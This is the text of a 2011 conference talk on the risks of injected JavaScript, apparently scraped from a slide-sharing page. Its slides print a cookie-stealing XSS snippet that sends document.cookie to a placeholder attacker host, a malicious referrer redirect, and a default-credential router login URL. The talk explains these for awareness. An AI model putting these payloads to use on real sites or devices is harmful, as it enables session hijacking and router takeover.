Javascript Gone Wild

JAVASCRIPT goneWILD
AkashMahajan | jsFoo 2011

WARNING
NSFW
Don’t say I didn’t warn you. This presentation is Not Safe For Work.

Don’t worry
I swear this presentation doesn’t have dirty pictures in it.
No Dirty Pictures

DISCLAIMER
Tech Lite
This presentation is low on technical content.

Why bother?
INCEPTION
Planting the seed of an idea.

What is the idea?
JavaScript code showing up in unexpected places can have unintended consequences.
Can you have fun and profit from this somehow?

Wild Idea #1
Stealing a session cookie
<script>
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src","http://evil.cxm/cookiestealer?stolencookie" + document.cookie);
document.body.appendChild(ifrm);
</script>
Firesheep also does session hijacking by stealing cookies in transit.

Wild Idea #1.5
One can steal username and password with JS in a login form.

Wilder Idea #2
Stealing the Google page rank
if(document.referrer == 'google') {
varlocationurl = 'http://evil.cxm/google1.php';
location.href = locationurl;
}
Do you regularly check the link you get from google to your site?

Wilder Idea #2.5
What if the JavaScript redirects users to a malicious download page?

Wildest Idea #3
Login to an internal ADSL router website using a default username and password.
varloginUrl = ‘http://admin:admin@192.168.1.1/’;
document.location = loginUrl;
Obviously you all have changed the default password long back, right

Wildest Idea #3.5
Allowing untrusted code in the browser is not the smartest thing to do.

His WILDNESS!!!
SamyKamkar wrote JS code to get more friends in MySpace.
At one point he had over a millionfriends in less than 24 hours

Jumping to conclusions
JavaScript can be pretty wild if it shows up in unexpected places. The very idea that outside code is allowed execution in the browser is radical and dangerous.

PIMPING MYSELF/ QnA
AkashMahajan
Web Security Consultant
http://akashm.com | @makash
akashmahajan@gmail.com | 9980527182

References, Attribution
Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat 2006 conference.
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf
Image on slide 13 has been taken from http://www.flickr.com/photos/iscteiul/ . The image is available for reuse under Creative Commons.
Some Reference Links
JavaScript History Stealing Attack
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
Samy is my Hero – MySpace XSS Worm
http://namb.la/popular/tech.html
JavaScript to steal session cookies
http://jehiah.cz/a/xss-stealing-cookies-101
http://www.go4expert.com/forums/showthread.php?t=17066
http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/
Trailer of the Movie ‘The Dirty Picture’
http://www.youtube.com/thedirtypicturefilm
Ending of the movie inception explained.
http://screenrant.com/inception-spoilers-discussion-kofi-68330/
06-Grossman.pdf

http://funnel.hasgeek.com	558
http://www.siggyvolgt.nl	65
http://paper.li	52
http://lanyrd.com	20
http://feeds.feedburner.com	4
http://translate.googleusercontent.com	3
http://hasgeek.tv	3
http://us-w1.rockmelt.com	1

Javascript Gone Wild

by Akash Mahajan

Accessibility

Categories

Upload Details

Usage Rights

8 Embeds 706

Statistics

Javascript Gone Wild Presentation Transcript